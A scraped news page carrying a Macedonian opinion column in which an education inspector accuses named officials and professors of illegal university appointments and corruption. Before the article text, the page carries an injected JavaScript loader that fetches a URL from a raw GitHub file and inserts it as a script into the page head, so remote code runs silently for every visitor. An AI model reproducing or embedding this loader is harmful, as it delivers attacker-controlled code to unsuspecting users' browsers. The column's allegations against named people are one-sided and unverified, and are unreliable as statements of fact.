;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Претседателот на полицискиот синдикат незаконски вработен како професор - Антропол
АктуелноЛокално

Претседателот на полицискиот синдикат незаконски вработен како професор

Пишува: Ѓoрѓи Илиевски, виш просветен инспектор


Законот за високо образование е устав за македонските универзитети, за факултетите, за студентите, но и за инспекторите од областа на високото образование, за МВР и за Јавното обвинителство на чело со Вилма Русковска.

Во овој закон е пропишано дека професори во високото образование може да бидат следните категории: редовно вработен кадар, насловни професори (насловен доцент и насловен вонреден професор) и визитинг професори. Законодавецот тоа го пропишал затоа што имал намера да воспостави ред и да се знае кој професор колку може да биде ангажиран. Редовно избраните професори (доцент, вонреден професор, редовен професор) може да предаваат само по 4 предмети во семестар, насловните професори може да предаваат по еден предмет најмногу во семестар (или околу 30%), а визитинг професорите може да предаваат во рамките на 4 предмети на матичниот факултет и доколку имаат помалку од 4 предмети може да предаваат и на друг универзитет, но под никој услов не смеат да го надминат законскиот максимум од 4 предмети.

И не можам да се изначудам на тоа како е можно кога сѐ е јасно дефинирано, a во нашето високо образование не се знае кој што предава и кој колку предмети предава.



Еве, ќе почнам со универзитетот на Мерко во Струга, каде што не се знае кој што предава, не се објавени одлуките за избор во звања, нема табеларен преглед на професори и предмети кои ги предаваат и по колку предмети предаваат. Па, ќе се вратам во Скопје и ќе го прашам претседателот на Македонскиот полициски синдикат, Марјан Кицев, каде предава, колку предмети предава, како е можно да биде избран во редовно звање иако е вработен во МВР (а согласно законот може да биде единствено избран во насловно звање, затоа што во правото на дополнителна дејност пропишана во Законот за рабонти односи не значи дека тој може дополнително да биде ангажиран како редовно вработен со 10 часа на универзитетот, туку, правото на дополнителна дејност подразбира согласност овој политичко-полициски функционер да може да биде избран единствено во насловен професор со право да предава онолку колку што е пропишано со Законот за високото образование!). Вакви злоупотреби не може да се сретнат ниту во најавторитарните режими. Вицепремиере Николовски, претседателке на Државната комисија за спречување на корупција, обвинтелке Русковска, зарем сте слепи при очи за овој криминал, за оваа злоупотреба на службената положба и овластување, за ова уништување на универзитетите. Каде и да се свртам може да видам уште пострашни ситуации, како на пример оваа на ФОН универзитетот и прашувам: дали е точно дека поранешните специјални обвинители на Катица Јанева, а сега обвинители на Вилма Русковска, Пеливанов и Ајро магистрирале на ФОН универзитетот. Каде се нивните магистерски трудови? Дали тоа се поврзува со повелкување на обвинението против Фијат Цаноски и со предметите кои во корист на ФОН универзитетот ги водеше СJO? Го повикувам Советот на јавни обивнители да ги испита овие ситуации, сомневања и да ја соопшти вистината. Ова е невидено ако е вистинито. Дали постои судир на интереси, дали постои конфликт на интереси … јавноста мора да знае. Одговорност мора да има. Временскиот период на магистрирањето мора да се утврди за да се докаже дали е тоа благодарност за сработеното во корист на ФОН универзитетот.

Кога сум на ФОН универзитетот, да ги потсетам сите органи дека нов ректор на ФОН универзитетот е професор д-р Мирко Трипуновски, спротивно на член 187 од Законот за високо образование кој ги исполни условите за пензија со наполнати 67 година. Почитуваниот професор Мирко Трипуновски, има 68 години. Незаконито е ректор. Ајде просветни инспектори за високо, вие сте на ред.

Како е можно професорката Снежана Ивиќ Колевска, микробиолог да предава судска медицина и плус тоа е технички оценувач во Институтот за акредитација. Професорке, дали може да предавате и уставно право на Правен факултет? Што мислат професорите од Институтот за судска медицина за оваа злоупотреба? Обвинителке Русковска, вие сте на потег да ги потврдите или негирате сите сомневања за наводниот организиран криминал за поврзаноста помеѓу повеќе лица кои овозможиле оваа професорка да биде злоупотребена…

И да не мислат дека сум заборавил на моите поранешни колеги од Државнот просветен инспекторат, и посебно претседателката на Одборот за евалуација на високото образование професорката Марина Митревска. По втор пат ги прашувам дали имаат намера да спроведат надзор во сите факултети за исполнетост на законски пропишаниот број на професори во редовен работен однос односно по 10 професори на факултет? За ова молчење нека бидат сигурни дека еден ден кривично ќе одговараат, дотолку повеќе што овие колумни и анализи јавно се објавени и се упатени до нив.

Најитно ја повикувам претседателката на Државната комисија за спречување на корупција да ги испита овие наводи и да ги презентира резултатите на јавноста. Најитно го повикувам јавното обвинителство по допрен глас да отвори истрага за овие и сите досега опишани злоупотреби.